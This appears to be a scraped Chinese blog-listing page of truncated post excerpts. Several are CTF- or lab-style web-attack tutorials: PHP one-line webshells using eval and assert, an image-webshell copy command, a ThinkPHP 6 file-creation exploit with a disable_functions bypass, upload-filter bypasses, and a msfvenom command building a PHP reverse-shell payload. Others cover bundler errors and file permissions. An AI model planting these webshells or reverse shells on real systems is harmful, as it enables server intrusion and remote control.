1-GIF89a 2-copy 1.jpg/b+2.php/a 1_2.jpg 3-修改图片版权信息 ...
分类:
Web程序 时间:
2020-02-24 09:17:26
阅读次数:
234
登陆抓包,改成32位,根据tp6任意创建文件的漏洞,修改cookie。 上传文件、 木马在/runtime/session下, 然后传bypass文件绕过disablefunction,得到flag ...
分类:
其他好文 时间:
2020-02-24 00:49:03
阅读次数:
74
报错如下: [*] Bundler failed to load and returned this error: 'cannot load such file -- bundler/setup'[*] You may need to uninstall or upgrade bundler 解决如 ...
分类:
其他好文 时间:
2020-02-23 13:09:47
阅读次数:
123
一句话木马书写:为什么是一句话木马,因为他可以通过函数接收指定的参数来让我们的操作系统执行指定的命令 1.eval函数 <?php eval($_REQUEST['a]);?> 2.assert函数 <?php assert($_REQUEST["a"]); ?> 3.匿名方法构造 <?php fu ...
分类:
其他好文 时间:
2020-02-23 11:47:13
阅读次数:
106
制作图片木马 提示:请使用windows的画图自己画一张图片,另存为jpg 操作截图: Copy test.jpg/b+test.php/a 1.jpg ...
分类:
其他好文 时间:
2020-02-23 11:39:28
阅读次数:
56
连点器 介绍 顾名思义,可以连续点的机器。 当然,连续可快可慢;机器意味着不许要人工点击;可以是生活中的机器,也可以是电脑中的程序。 现在,连点器网上一搜一大堆,什么鼠标连点精灵,鼠大侠……不仅有电脑的,还有安卓系统的。 但是,用这些软件,我很不放心。说不定就有什么木马病毒呢…… 再说,我们这些co ...
分类:
其他好文 时间:
2020-02-21 18:38:06
阅读次数:
135
一 建立反弹后门 msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下; 将生成的木马上传到目标机中,可以远程访问; windows下as ...
分类:
Web程序 时间:
2020-02-19 13:05:16
阅读次数:
266
一、目录权限设置很重要:可以有效防范黑客上传木马文件.如果通过 chmod 644 * -R 的话,php文件就没有权限访问了。如果通过chmod 755 * -R 的话,php文件的权限就高了。 所以就需要分开设置目录权限和文件权限: linux 服务器权限:经常要用到的命令: find /pat ...
分类:
其他好文 时间:
2020-02-18 17:57:48
阅读次数:
80
一、运行exe程序反弹shell 需要先生成exe木马,然后将exe文件上传到服务器上,最后在服务器上运行该文件。可使用msfvenom生成exe木马。 二、加载dll文件反弹shell 需要先生成dll文件,然后使用regsvr32.exe加载dll。可使用msfvenom生成dll文件。 三、P ...
文件上传(基于前端防护的绕过) 查看源代码:发现唯一做的防护就是调用了js的一个方法 然后可以在控制台上直接取消使用这个方法: 上传准备的一句话木马文件,然后就可以进行菜刀连接(post)或者构造url(get) http://192.168.0.105/pikachu/vul/unsafeuplo ...
分类:
其他好文 时间:
2020-02-15 23:29:35
阅读次数:
109
